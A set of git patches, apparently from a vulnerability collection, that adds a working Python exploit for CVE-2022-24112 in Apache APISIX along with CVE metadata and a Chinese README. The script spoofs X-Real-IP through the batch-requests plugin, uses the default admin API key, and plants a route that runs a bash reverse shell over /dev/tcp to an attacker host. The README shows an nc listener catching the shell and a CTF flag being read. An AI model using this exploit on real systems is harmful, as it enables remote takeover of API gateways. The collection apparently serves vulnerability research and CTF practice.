From c36f76ff1046e6100487e50bf1bf008f93c15ee2 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 03:57:40 +0000 Subject: [PATCH 1/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2022/.keep diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 265fefbd80e457939df7c8cc4630b80aeff2199c Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 03:57:50 +0000 Subject: [PATCH 2/7] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-24112?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/CVE-2022-24112/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2022/CVE-2022-24112/.keep diff --git a/cve/apache/2022/CVE-2022-24112/.keep b/cve/apache/2022/CVE-2022-24112/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2d3cb2066399aa4ba3cf37829b498a1c8557edf7 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 03:58:23 +0000 Subject: [PATCH 3/7] add CVE-2022-24112 Signed-off-by: zxengweihao --- .../2022/CVE-2022-24112/CVE-2022-24112.yaml | 20 +++++ .../CVE-2022-24112_Linux_by_twseptian.py | 88 +++++++++++++++++++ cve/apache/2022/CVE-2022-24112/README.md | 22 +++++ 3 files changed, 130 insertions(+) create mode 100644 cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml create mode 100644 cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py create mode 100644 cve/apache/2022/CVE-2022-24112/README.md diff --git a/cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml new file mode 100644 index 00000000..a04989dd --- /dev/null +++ b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-24112 +source: https://github.com/Acczdy/CVE-2022-24112_POC +info: + name: Apache Apisix是美国阿帕奇(Apache)基金会的一个云原生的微服务API网关服务。该软件基于 OpenResty 和 etcd 来实现,具备动态路由和插件热加载,适合微服务体系下的 API 管理。 Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。 + severity: critical + description: | + Apache APISIX apisix/batch-requests 插件允许将 X-REAL-IP 头覆盖为 RCE;攻击者可以滥用 batch-requests 插件发送请求以绕过 Admin API 的 IP 限制。 Apache APISIX 的默认配置(带有默认 API 密钥)容易受到远程代码执行的攻击。 当admin key 被改变或者Admin API 的端口被改变到与数据面板不同的端口时,影响会更小。 但是绕过Apache APISIX的数据面板的IP限制还是有风险的。 批处理请求插件中有一个检查,它用真实的远程 IP 覆盖客户端 IP。 但是由于代码中的错误,可以绕过此检查。 + scope-of-influence: + apache apisix 2.10.4及其之前所有版本;2.11.0-2.12.1 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-24112 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + cnvd-id: + kve-id: + tags: cve,cve2022,apache,rce,apisix \ No newline at end of file diff --git a/cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py new file mode 100644 index 00000000..a47586d8 --- /dev/null +++ b/cve/apache/2022/CVE-2022-24112/CVE-2022-24112_Linux_by_twseptian.py @@ -0,0 +1,88 @@ +# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE) +# Date: 2022-03-16 +# Exploit Author: Ven3xy +# Vendor Homepage: https://apisix.apache.org/ +# Version: Apache APISIX 1.3 – 2.12.1 +# Tested on: CentOS 7 +# CVE : CVE-2022-24112 + + +import requests +import sys + +class color: + HEADER = '\033[95m' + IMPORTANT = '\33[35m' + NOTICE = '\033[33m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + RED = '\033[91m' + END = '\033[0m' + UNDERLINE = '\033[4m' + LOGGING = '\33[34m' +color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING] + + +def banner(): + run = color_random[6]+'''\n . , + _.._ * __*\./ ___ _ \./._ | _ *-+- + (_][_)|_) |/'\ (/,/'\[_)|(_)| | + | | +\n''' + run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' + run3 = color_random[4]+'''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n''' + run4 = '''POWERBY:M4xSec & only:chunqiuyunjing.com''' + print(run+run2+run3+run4) + +if (len(sys.argv) != 4): + banner() + print("[!] Usage : ./apisix-exploit.py ") + exit() + +else: + banner() + target_url = sys.argv[1] + lhost = sys.argv[2] + lport = sys.argv[3] + +headers1 = { + 'Host': target_url, + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Content-Length': '540', + 'Connection': 'close', +} + +headers2 = { + 'Host': target_url, + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Accept': '*/*', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/json', + 'Connection': 'close', +} + +json_data = { + 'headers': { + 'X-Real-IP': '127.0.0.1', + 'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', + 'Content-Type': 'application/json', + }, + 'timeout': 1500, + 'pipeline': [ + { + 'path': '/apisix/admin/routes/index', + 'method': 'PUT', + 'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}', + }, + ], +} + +response1 = requests.post('http://'+target_url+'/apisix/batch-requests', headers=headers1, json=json_data, verify=False) + +response2 = requests.get('http://'+target_url+'/rms/fzxewh', headers=headers2, verify=False) diff --git a/cve/apache/2022/CVE-2022-24112/README.md b/cve/apache/2022/CVE-2022-24112/README.md new file mode 100644 index 00000000..f63768e9 --- /dev/null +++ b/cve/apache/2022/CVE-2022-24112/README.md @@ -0,0 +1,22 @@ +**CVE-2022-24112_Linux_by_twseptian.py** + +1. VPS开启监听:`nc -lvvp 18888` +2. 进入POC目录运行: + + **注意**:此处添加-t的数据时,不需要写入`http://`或`https://`,只需要域名+端口即可,如下 + ``` + python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR + ``` +3. 返回查看VPS情况如下 + ``` + [root@root ~]# nc -lvvp 18888 + Ncat: Version 7.50 ( https://nmap.org/ncat ) + Ncat: Listening on :::18888 + Ncat: Listening on 0.0.0.0:18888 + Ncat: Connection from x.x.x.x. + Ncat: Connection from x.x.x.x:x. + id + uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) + cat /flag + flag{0834f79f-5f40-4389-bce7-c64e969734c4} + ``` \ No newline at end of file -- Gitee From 41d2873fa5a6a116e4288e27f3a726133c9ec9cf Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 04:06:32 +0000 Subject: [PATCH 4/7] add info in openkylin_list.yaml Signed-off-by: zxengweihao --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 1c5bc747..25b02ac9 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,7 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + - CVE-2022-24112 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee From 47ebe64445d2aebbd0298d1231422a16fb1949f5 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 04:10:34 +0000 Subject: [PATCH 5/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2022/.keep diff --git a/cve/apache/2022/.keep b/cve/apache/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From de95745a101f13d1006c34a939278c9a299912bb Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 04:10:55 +0000 Subject: [PATCH 6/7] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache/2022/CVE-2022-24112/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2022/CVE-2022-24112/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2022/CVE-2022-24112/.keep diff --git a/cve/apache/2022/CVE-2022-24112/.keep b/cve/apache/2022/CVE-2022-24112/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From a55c61cb7b4c12c82264531b00f7c8ffba0bcfba Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 9 Mar 2023 14:14:00 +0000 Subject: [PATCH 7/7] =?UTF-8?q?=E5=9C=A8yaml=E4=B8=AD=E6=96=B0=E5=BB=BA?= =?UTF-8?q?=E5=88=97=E8=A1=A8apache=20apisix?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- openkylin_list.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 25b02ac9..45f23b4b 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,7 +4,6 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - - CVE-2022-24112 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 @@ -49,6 +48,8 @@ cve: - CVE-2021-3517 - CVE-2021-3518 - CVE-2021-3537 + apache apisix: + - CVE-2022-24112 cnvd: kve: kylin-software-properties: -- Gitee